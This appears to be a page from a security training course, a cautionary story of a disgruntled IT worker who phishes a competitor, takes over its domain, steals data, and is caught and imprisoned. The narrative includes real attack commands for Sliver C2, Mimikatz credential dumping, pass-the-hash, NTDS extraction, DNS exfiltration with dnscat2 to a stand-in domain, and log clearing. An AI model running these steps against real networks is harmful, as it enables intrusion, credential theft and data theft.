From Idea to Incarceration

The Complete Attack Lifecycle: A Cautionary Tale

This Is How It Ends

Every hacker thinks they're different. Smarter. More careful. They all end up the same way. This is the complete story of an attack - from the first spark of an idea to the cold reality of a federal prison cell. This is not fiction. This is a composite of real cases, real mistakes, and real consequences.

The Complete Lifecycle

    THE IDEA          "I could totally hack them..."
         ↓
    RECON             Research, OSINT, target selection
         ↓
    WEAPONIZE         Infrastructure, payloads, C2
         ↓
    DELIVER           Phishing, initial access
         ↓
    EXPLOIT           Code execution, privesc
         ↓
    PERSIST           Survive reboots, maintain access
         ↓
    C2                Lateral movement, credential theft
         ↓
    ACTIONS           Exfiltration, ransomware, destruction
         ↓
    COVER TRACKS      Log deletion, timestomping
         ↓
    GET CAUGHT        One mistake is all it takes
         ↓
    INVESTIGATION     FBI, forensics, grand jury
         ↓
    ARREST            6 AM raid, handcuffs, perp walk
         ↓
    TRIAL             Plea deal or jury conviction
         ↓
    PRISON            Federal time, no parole
         ↓
    AFTER             Felon for life, career destroyed

Act I: The Seed

Genesis

Day 0 - The Idea

It Always Starts Small

Marcus worked IT at a mid-size company. Good at his job. Underpaid. Passed over for promotion three times. Then he found a vulnerability in a competitor's website during a late-night curiosity session.

"I'm not going to do anything. I'm just... looking. It's not illegal to look. Besides, their security is pathetic. Someone should tell them."

He didn't tell them. He bookmarked it instead. Told himself he'd report it later. The bookmark sat there for two weeks. Then curiosity turned into planning.

Recon

Week 1-4 - Target Research

Reconnaissance Phase

Marcus started researching. LinkedIn profiles of their IT staff. Company org charts. Job postings revealed their tech stack. DNS records showed their infrastructure. He built a complete picture without touching their systems.

$ theHarvester -d targetcorp.com -b all $ subfinder -d targetcorp.com $ shodan search "targetcorp"

"This isn't hacking. It's just... research. All public information. Anyone could do this. I'm learning. That's allowed."

Reality check: He was building a target package. Every piece of information would later be used as evidence of premeditation.

Act II: The Build

Weaponize

Week 5-8 - Infrastructure Setup

Building the Arsenal

Marcus bought a VPS with Bitcoin. Set up a C2 server. Used Tor for everything. He felt invisible. Untraceable.

# "Anonymous" VPS purchase $ ssh root@185.xxx.xxx.xxx # Sliver C2 installation $ ./sliver-server # Payload generation sliver > generate --mtls 185.xxx.xxx.xxx --os windows

"Bitcoin is anonymous. Tor is untraceable. I'm using a VPS in Moldova. There's no way this comes back to me. I've read all the guides."

What he didn't know: The Bitcoin exchange he used required KYC verification two years ago. His ID was on file. The VPS provider kept logs despite their "no logs" policy. Tor exit nodes were monitored. Every "anonymous" layer had a hole.

Payload

Week 9-10 - Crafting the Attack

Payload Development

He built a phishing email. Spoofed the CEO's address. Attached a macro-enabled document that would download his implant. Tested it against his own machine. It worked perfectly.

From: ceo@targetcorp.com (spoofed) Subject: Q4 Budget Review - URGENT ACTION REQUIRED Attachment: Q4_Budget_Review_CONFIDENTIAL.xlsm

"It's so easy. Their email doesn't even have DMARC properly configured. They're basically asking for this."

Act III: The Attack

Deliver

Week 11, Monday 9:47 AM - Initial Access

The Phish That Landed

Sent to 15 employees. Sarah in accounting opened it. Enabled macros because the document said to. Marcus watched his C2 console light up with a new beacon.

[*] Session 1 opened - TARGETCORP\sarah.jones @ ACCT-WS-047 [*] Beacon checking in every 60 seconds

"Holy shit. It worked. I'm in. I'm actually in. This is real. What do I do now?"

His hands were shaking. He should have stopped here. He didn't.

Exploit

Week 11, Monday-Wednesday - Privilege Escalation

Going Deeper

Sarah's workstation was just the beginning. Marcus ran local privesc exploits. Got SYSTEM. Dumped credentials from memory. Found a domain admin logged in.

sliver > getsystem [*] Got SYSTEM! sliver > mimikatz Username: admin.thompson NTLM: aad3b435b51404eeaad3b435b51404ee

First evidence trail: Every command was logged by the endpoint detection software. It wasn't blocking, just alerting. Security was already investigating.

Lateral

Week 11-12 - Network Spread

Lateral Movement

Using the stolen domain admin hash, Marcus moved laterally. File servers. Database servers. The domain controller itself. He owned everything.

# Pass-the-hash to DC $ psexec.py -hashes :aad3b435b51404ee admin.thompson@DC01 # Full domain compromise C:\> ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q

"Domain admin. I have everything. Their entire Active Directory. Every password. Every secret. I'm a god in their network."

Actions

Week 12-13 - The Heist

Exfiltration

Customer database. 2.3 million records. Financial documents. R&D plans. Trade secrets. Marcus compressed it all, encrypted it, and exfiltrated it over DNS tunneling.

# Data staging $ tar czf data.tar.gz /mnt/shares/customers/ /mnt/shares/finance/ # DNS exfiltration $ dnscat2 --dns domain=exfil.marcus-c2.com --secret=hunter2 [+] Sending 4.7GB over 847,293 DNS queries...

Second evidence trail: 847,293 DNS queries to a single domain over 48 hours. Their SIEM flagged it immediately. Incident response was already engaged.

Act IV: The Cleanup (That Wasn't)

Cover Tracks

Week 13 - Anti-Forensics

Attempting to Hide

Marcus tried to cover his tracks. Deleted event logs. Cleared PowerShell history. Timestomped files. Removed his persistence mechanisms.

# Clear Windows Event Logs wevtutil cl Security wevtutil cl System wevtutil cl Application # Timestomp implant timestomp.exe C:\Windows\Temp\svc.exe -m "01/15/2019 12:00:00"

"Clean. Everything's clean. No logs, no evidence. It's like I was never there."

What he missed:

Event log clearing itself generates Event ID 1102 (forwarded to SIEM)
$MFT timestamps weren't touched - forensics would find the discrepancy
Firewall logs were on a separate system he never accessed
Their cloud backup had snapshots from before he started deleting
DNS query logs were at their ISP, not on-premise

Act V: The Unraveling

Detected

Week 14 - The Call

Incident Response Begins

TargetCorp's managed security provider had been watching the whole time. When they saw event logs being cleared, they knew it was serious. They called in a major IR firm. Forensic images were captured. FBI was notified.

What Marcus Didn't Know

A full incident response team was analyzing his every move while he thought he was "cleaning up." By the time he finished deleting logs, they had complete forensic images with everything preserved.

Traced

Week 15-20 - Attribution

Following the Breadcrumbs

The FBI Cyber Division took the case. They started pulling threads.

VPS Provider: Responded to legal request with payment records pointing to Bitcoin exchange
Bitcoin Exchange: Provided KYC documents - Marcus's driver's license
ISP Logs: Showed Tor connections from Marcus's home IP during attack windows
Employer Records: Confirmed Marcus had IT skills and motive (passed over for promotion)
Writing Analysis: Phishing email writing style matched Marcus's work emails

"Why is my boss acting weird? Why did HR ask for my badge yesterday? Probably nothing. Just paranoia."

Warrant

Week 22 - Grand Jury

The Indictment

Federal grand jury returned a sealed indictment:

18 U.S.C. § 1030(a)(2): Unauthorized access to protected computer (5 years)
18 U.S.C. § 1030(a)(5): Intentional damage to protected computer (10 years)
18 U.S.C. § 1028A: Aggravated identity theft (mandatory 2 years consecutive)
18 U.S.C. § 1343: Wire fraud (20 years)
18 U.S.C. § 1832: Theft of trade secrets (10 years)

Maximum exposure: 47 years federal prison

Act VI: The Fall

Arrest

Week 24, Tuesday 6:03 AM

The Raid

Marcus was asleep when the FBI knocked. Actually, they didn't knock - they used a battering ram. Eight agents. Guns drawn. His wife screaming. Kids crying. Neighbors watching from windows.

┌─────────────────────────────┐
│                             │
│         [PHOTO]             │
│                             │
│   FBI CYBER DIVISION        │
│   CASE: 2024-CF-03847       │
│                             │
│   MARCUS [REDACTED]         │
│   DOB: [REDACTED]           │
│   ARREST: 6:03 AM           │
│                             │
└─────────────────────────────┘

Federal Booking Photo

They took everything. Every computer. Every phone. Every USB drive. External hard drives he forgot existed. His kids' tablets (might have been used). His wife's laptop. The router. Smart home devices. Everything.

This isn't happening. This can't be happening. I was careful. I used Tor. I used Bitcoin. How did they find me?

Legal

Months 1-8 - Legal Process

The System Grinds

Initial appearance. Bail hearing. Denied bail (flight risk, technical sophistication). Preliminary hearing. Arraignment. Discovery (thousands of pages of evidence against him). Motion hearings. Suppression motions denied. Trial date set.

The Evidence Against Him

47 terabytes of forensic images
Complete C2 server logs (VPS provider cooperated)
Bitcoin transaction chain to his verified identity
Timing correlation between Tor usage and attack commands
Writing analysis matching his known communications
Motive established through employment records
Stolen data found on his encrypted drive (password was in browser)

His attorney recommended a plea deal. Trial would mean maximum sentencing guidelines. Prosecutors offered 12 years in exchange for a guilty plea.

Sentence

Month 10 - Sentencing Hearing

The Judgment

Marcus took the deal. 12 years federal prison. No parole in federal system - he'll serve at least 85% of that sentence. Plus 3 years supervised release. $2.3 million in restitution. Lifetime ban from computers without permission from probation officer.

UNITED STATES v. MARCUS [REDACTED] CASE NO: 2024-CF-03847 SENTENCE: - 144 months (12 years) Federal Bureau of Prisons - 36 months supervised release - $2,347,892.00 restitution - Special conditions: No computer access without PO approval FACILITY DESIGNATION: FCI [REDACTED] SURRENDER DATE: [REDACTED]

─── 10 YEARS LATER ───

Release

Year 10 - After Prison

The Aftermath

Marcus was released after serving 10 years (85% of his sentence with good behavior). He walked out at age 44. Here's what he found:

Marriage: Divorced. Wife couldn't handle the stigma and financial ruin.
Kids: His children were 8 and 6 when he went in. Now 18 and 16. They barely know him.
Career: Felon. Can't pass a background check. Can't work in IT, finance, healthcare, education, government, or any job requiring clearance.
Finances: Still owes $2.1 million in restitution. Wages garnished for life.
Technology: Needs permission from PO to use a smartphone. Random computer searches for 3 years.
Housing: Many apartments won't rent to felons. Living in a halfway house.

"I lost everything for $0. I never sold the data. Never made a cent. Just wanted to prove I could do it. Prove I was smart. Look where smart got me."

The Real Lesson

There Is No "Untraceable"

Every technique in this training material has a detection method. Every "anonymous" service has a weakness. Every "perfect" operation has a single mistake waiting to unravel it.

Bitcoin: Blockchain is permanent. One exchange with KYC = identity exposed.
Tor: Timing correlation, exit node monitoring, operational mistakes.
VPS "No Logs": They all keep logs when law enforcement asks nicely with a warrant.
Deleted Logs: Backups, SIEM forwarding, cloud snapshots, ISP records.
Encryption: Password in browser. Rubber hose cryptanalysis. Key escrow.

The FBI has unlimited time and resources. You have one chance to make zero mistakes. Those odds don't favor you.

What These Skills Are Actually For

Previous The Long Con Next Mr. Robot Decoded